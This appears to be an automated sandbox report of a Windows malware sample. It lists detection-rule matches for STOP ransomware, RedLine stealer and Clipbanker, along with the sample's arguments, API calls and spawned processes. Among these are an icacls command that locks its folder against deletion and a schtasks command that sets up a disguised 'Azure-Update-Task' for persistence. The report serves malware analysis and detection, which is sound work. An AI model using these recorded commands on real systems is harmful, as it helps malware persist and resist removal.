Source: 0000000A.00000002.1913660685.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000010.00000002.1916720423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000010.00000002.1916720423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000018.00000002.2116911139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000018.00000002.2116911139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000002.4129272399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000002.4129272399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000017.00000002.2105054288.00000000044CA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.1701674378.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000007.00000002.1787558327.0000000001ACE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000002.2350442166.0000000000990000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000017.00000002.2105470149.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000A.00000002.1914065003.000000000098D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.1848123271.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000C.00000002.1864325643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000C.00000002.1864325643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001E.00000002.3584399204.00000000009E0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Process Memory Space: SUwX12D2S6.exe PID: 7260, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: SUwX12D2S6.exe PID: 7276, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: SUwX12D2S6.exe PID: 7376, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: SUwX12D2S6.exe PID: 7396, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: SUwX12D2S6.exe PID: 7460, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: SUwX12D2S6.exe PID: 7488, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: SUwX12D2S6.exe PID: 7772, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: SUwX12D2S6.exe PID: 7792, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: SUwX12D2S6.exe PID: 7264, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: SUwX12D2S6.exe PID: 7252, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.rans.spre.troj.spyw.evad.winEXE@45/1373@9/5
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree, 1_2_00411900
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_0459B7C6 CreateToolhelp32Snapshot,Module32First, 0_2_0459B7C6
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize, 1_2_0040D240
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3752:120:WilError_03
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8112:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Mutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: --Admin 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: IsAutoStart 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: IsTask 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: --ForNetRes 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: IsAutoStart 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: IsTask 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: --Task 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: --AutoStart 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: --Service 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: X1P 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: --Admin 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: runas 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: x2Q 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: x*P 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: C:\Windows\ 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: D:\Windows\ 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: 7P 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: %username% 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: F:\ 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: --Admin 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: IsAutoStart 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: IsTask 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: --ForNetRes 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: IsAutoStart 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: IsTask 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: --Task 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: --AutoStart 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: --Service 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: X1P 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: --Admin 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: runas 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: x2Q 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: x*P 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: C:\Windows\ 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: D:\Windows\ 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: 7P 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: %username% 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Command line argument: F:\ 1_2_00419F90
Source: SUwX12D2S6.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: build2.exe, 00000008.00000002.1970716529.0000000020E29000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1970251533.000000001E8E8000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: build2.exe, 00000008.00000002.1970716529.0000000020E29000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1970251533.000000001E8E8000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: build2.exe, 00000008.00000002.1970716529.0000000020E29000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1970251533.000000001E8E8000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: build2.exe, 00000008.00000002.1970716529.0000000020E29000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1970251533.000000001E8E8000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: build2.exe, 00000008.00000002.1970716529.0000000020E29000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1970251533.000000001E8E8000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: build2.exe, 00000008.00000002.1970716529.0000000020E29000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1970251533.000000001E8E8000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: build2.exe, 00000008.00000002.1970716529.0000000020E29000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1970251533.000000001E8E8000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: build2.exe, 00000008.00000002.1970716529.0000000020E29000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1970251533.000000001E8E8000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: build2.exe, 00000008.00000002.1970716529.0000000020E29000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1970251533.000000001E8E8000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: build2.exe, 00000008.00000002.1970716529.0000000020E29000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1970251533.000000001E8E8000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: build2.exe, 00000008.00000002.1970716529.0000000020E29000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1970251533.000000001E8E8000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: SUwX12D2S6.exe Virustotal: Detection: 40%
Source: SUwX12D2S6.exe String found in binary or memory: set-addPolicy
Source: SUwX12D2S6.exe String found in binary or memory: id-cmc-addExtensions
Source: SUwX12D2S6.exe String found in binary or memory: set-addPolicy
Source: SUwX12D2S6.exe String found in binary or memory: id-cmc-addExtensions
Source: SUwX12D2S6.exe String found in binary or memory: set-addPolicy
Source: SUwX12D2S6.exe String found in binary or memory: id-cmc-addExtensions
Source: SUwX12D2S6.exe String found in binary or memory: set-addPolicy
Source: SUwX12D2S6.exe String found in binary or memory: id-cmc-addExtensions
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File read: C:\Users\user\Desktop\SUwX12D2S6.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SUwX12D2S6.exe "C:\Users\user\Desktop\SUwX12D2S6.exe"
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process created: C:\Users\user\Desktop\SUwX12D2S6.exe "C:\Users\user\Desktop\SUwX12D2S6.exe"
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process created: C:\Users\user\Desktop\SUwX12D2S6.exe "C:\Users\user\Desktop\SUwX12D2S6.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process created: C:\Users\user\Desktop\SUwX12D2S6.exe "C:\Users\user\Desktop\SUwX12D2S6.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown Process created: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe --Task
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Process created: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe --Task
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process created: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe "C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe"
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Process created: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe "C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe"
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process created: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe "C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe "C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe" --AutoStart
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Process created: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe "C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe" --AutoStart
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe Process created: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe "C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe"
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe "C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe" --AutoStart
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Process created: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe "C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe" --AutoStart
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
